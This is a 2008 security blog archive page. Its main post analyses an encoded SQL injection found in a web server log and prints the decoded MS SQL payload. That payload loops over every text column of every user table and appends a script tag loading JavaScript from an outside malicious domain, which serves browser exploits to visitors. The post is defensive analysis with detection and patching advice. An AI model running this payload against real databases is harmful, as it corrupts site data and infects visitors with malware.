Archive for the ‘Hack’ Category

HeX 2.0R Preview

Monday, October 6th, 2008

We are uploading the HeX 2.0 Release image to the mirror sites now; it is going to be released in another few hours. I won’t reveal much information here for the time being; check out the preview images.

HeX 2.0 preview

By the way, if you have not updated your WordPress installation to version 2.6.2, you should do it now. The hacking attempts are in the wild. This is the screenshot I had taken before I updated it weeks ago.

HeX 2.0 preview

Encoded SQL Injection

Thursday, April 24th, 2008

There is nothing new when you read security advisories on SQL injection vulnerabilities found in certain products or applications. Most of the SQL injections I have dealt with are plain SQL code injections, which makes it easy to search for the signs of an SQL injection attack in the HTTP log, unless the bad guys are using the POST method inside a form or something else.

Today I discovered a rare encoded SQL injection in one website’s HTTP log that targeted an MS SQL database. The bad guys used the HTTP GET method, with the SQL injection code encoded. It was not difficult to detect because of its long URL; below is the code.

script.asp?var=random';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST([...]

This is the decoded version of the HEX code in the CAST function:

DECLARE @T varchar(255),@C varchar(255)
-- cursor over every column of every user table (xtype='u') whose type is
-- ntext (99), text (35), nvarchar (231) or varchar (167)
DECLARE Table_Cursor CURSOR FOR
    select a.name,b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
    -- rewrite each text value: trimmed existing content followed by the script tag
    exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.nihaorr1.com/1.js></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It seems that the loop in the decoded code appends the js script tag after the first 30 characters of each field, discarding anything past the 30th character (convert(varchar, ...) without a length defaults to 30 characters). So the script is injected on the first run, and on a repeat run another copy lands after the 30th character.

With the SQL code encoded, the injection can easily bypass IDS and prevention rules, unless you have set the IDS to alert when a URL with more than a certain number of characters passes through it, or you inspect the HTTP log from time to time.

The js script redirects users to another page, 1.htm, which then tries to download exploits for outdated Real Player and for a few MS remote code execution vulnerabilities such as MS06-014, MS07-004, MS07-018 and others. So make sure your Windows and other third-party applications are always updated to the latest version or have the latest patch applied.

Updates:
It seems that this domain has been listed on malwaredomains.com since 17th April.